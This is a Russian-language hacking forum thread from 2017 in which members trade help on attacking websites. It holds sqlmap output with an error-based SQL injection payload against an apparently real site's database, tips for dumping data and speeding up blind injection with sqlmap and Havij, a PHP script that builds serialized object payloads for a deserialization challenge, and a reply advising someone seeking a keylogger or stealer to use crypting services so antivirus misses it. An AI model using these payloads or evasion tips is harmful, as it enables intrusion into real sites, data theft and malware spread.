HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1661  
Старый 20.01.2017, 20:54
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,123
С нами: 5738006

Репутация: 147


По умолчанию

Цитата:
Сообщение от brown  

Код:
Parameter: #1* ((custom) POST)
  Type: error-based
  Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  Payload: fetch_country=Angola' AND EXTRACTVALUE(5143,CONCAT(0x5c,0x71716a7871,(SELECT (ELT(5143=5143,1))),0x71766a7871))-- MuFD
---
[19:45:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.3
back-end DBMS: MySQL >= 5.1
[19:45:19] [INFO] fetching tables for database: 'db1084280_bizcsp'
[19:45:22] [WARNING] the SQL query provided does not return any output
[19:45:22] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]
Пробывал и no-cast и --hex не помгает
Y
 
Ответить с цитированием

  #1662  
Старый 20.01.2017, 21:08
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами: 5039606

Репутация: 1
По умолчанию

Цитата:
Сообщение от ms13  

Y
это понятно что Y ) Почему не хочет определять таблицы,Если перебором то стоит префикс и ничего не находит
 
Ответить с цитированием

  #1663  
Старый 20.01.2017, 21:26
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,123
С нами: 5738006

Репутация: 147


По умолчанию

Цитата:
Сообщение от brown  

Почему не хочет определять таблицы
Цитата:
Сообщение от brown  

стоит префикс и ничего не находит
Это и есть ответ! information_schema ведь отсутствует...
 
Ответить с цитированием

  #1664  
Старый 20.01.2017, 21:48
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от brown  

--dump-format=HTML --where=С:\
зачем плохому учишь)?

--where это условие для дампа, то есть --where="id
 
Ответить с цитированием

  #1665  
Старый 20.01.2017, 21:55
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от crlf  

У меня в тестовом скрипте жёсткая каша, хрен разберёшь
Побыстрому накидал небольшой скрипт для вызова
__get/__set,
надеюсь разберёшься:
Spoiler
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]map[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$map[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]realObject[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$realObject[/COLOR][COLOR="#007700"];
}

public function
[/COLOR][COLOR="#0000BB"]__set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]) { }

public function
[/COLOR][COLOR="#0000BB"]__get[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]) { }

public function
[/COLOR][COLOR="#0000BB"]offsetExists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]) {
return isset([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]map[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]]);
}

public function
[/COLOR][COLOR="#0000BB"]offsetUnset[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]) {
throw new[/COLOR][COLOR="#0000BB"]Exception[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Not supported !'[/COLOR][COLOR="#007700"]);
}

public function
[/COLOR][COLOR="#0000BB"]offsetSet[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]__set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);
}

public function
[/COLOR][COLOR="#0000BB"]offsetGet[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]__get[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]);
}
}
class[/
COLOR][COLOR="#0000BB"]Debug[/COLOR][COLOR="#007700"]{
private[/COLOR][COLOR="#0000BB"]$debugStateName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'flag'[/COLOR][COLOR="#007700"];
private[/COLOR][COLOR="#0000BB"]$_instance[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'ccc'[/COLOR][COLOR="#007700"];
}
class[/
COLOR][COLOR="#0000BB"]User[/COLOR][COLOR="#007700"]extends[/COLOR][COLOR="#0000BB"]GenericMapper[/COLOR][COLOR="#007700"]{

private
[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'aaa'[/COLOR][COLOR="#007700"];
private[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'bbb'[/COLOR][COLOR="#007700"];

public function
[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$realObject[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$map[/COLOR][COLOR="#007700"]) {
[/
COLOR][COLOR="#0000BB"]parent[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$realObject[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$map[/COLOR][COLOR="#007700"]);
}
}
class[/
COLOR][COLOR="#0000BB"]Session[/COLOR][COLOR="#007700"]{ }
[/
COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Session[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]User[/COLOR][COLOR="#007700"](new[/COLOR][COLOR="#0000BB"]Debug[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]=> array([/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'function'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'target'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'showNice'[/COLOR][COLOR="#007700"])));
echo[/
COLOR][COLOR="#DD0000"]"\n__get:\n"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]urlencode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]base64_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]))).[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]User[/COLOR][COLOR="#007700"](new[/COLOR][COLOR="#0000BB"]Debug[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"]=> array([/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'function'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'target'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'showNice'[/COLOR][COLOR="#007700"])));
echo[/
COLOR][COLOR="#DD0000"]"\n__set:\n"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]urlencode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]base64_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]))).[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR] 
подебажил

для __set не передается класс Session поэтому отрабатывает это условие

Код:
if (!isset($sess->user)) {
            $sess->user = new User();
            $sess->save();
        }
крут что сказать я не додумался до этого

правда туда всегда передаётся объект User...

честно говоря пока сам в режиме рандома -_-
 
Ответить с цитированием

  #1666  
Старый 20.01.2017, 22:03
foozzione
Познающий
Регистрация: 20.12.2016
Сообщений: 74
С нами: 4946006

Репутация: 0
По умолчанию

[QUOTE="t0ma5"]

зачем плохому учишь)?
--where это условие для дампа, то есть --where="id
 
Ответить с цитированием

  #1667  
Старый 22.01.2017, 16:53
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию

Цитата:
Сообщение от axe2009  

Подскажите кто знает! короче есть уязвимый сайт
вставляю ссылку в havij
и она мне сразу не выписывает список баз а как бы идёт перебор по буквам и только потом выводит название базы
можно ли как то без этого перебора что то сделать? чтоб сразу выводила всё
просто это очень долго ждать
подскажите решение
может через какую то другую тулзу попробовать можно
у тебя там похоже Time-blind начинает раскручивать. Как вариант можно попроовать в sqlmap раскрутить в булеан блайнд , он побыстрее идет ,а может даже и union будет
 
Ответить с цитированием

  #1668  
Старый 22.01.2017, 21:33
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Нужен кеилогер или стилер вирус чем создать?
 
Ответить с цитированием

  #1669  
Старый 22.01.2017, 21:57
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Octavian  

Нужен кеилогер или стилер вирус чем создать?
в паблике ничем, ищи сервисы по криптовке чтобы авир не палил
 
Ответить с цитированием

  #1670  
Старый 22.01.2017, 22:15
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 666
С нами: 5344886

Репутация: 441


По умолчанию

Цитата:
Сообщение от t0ma5  

честно говоря пока сам в режиме рандома -_-
Автор этого задания гений или наркоман со стажем, сложно представить как такое можно выдумать. Я до конца не понял почему это работает, но флаг получил
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.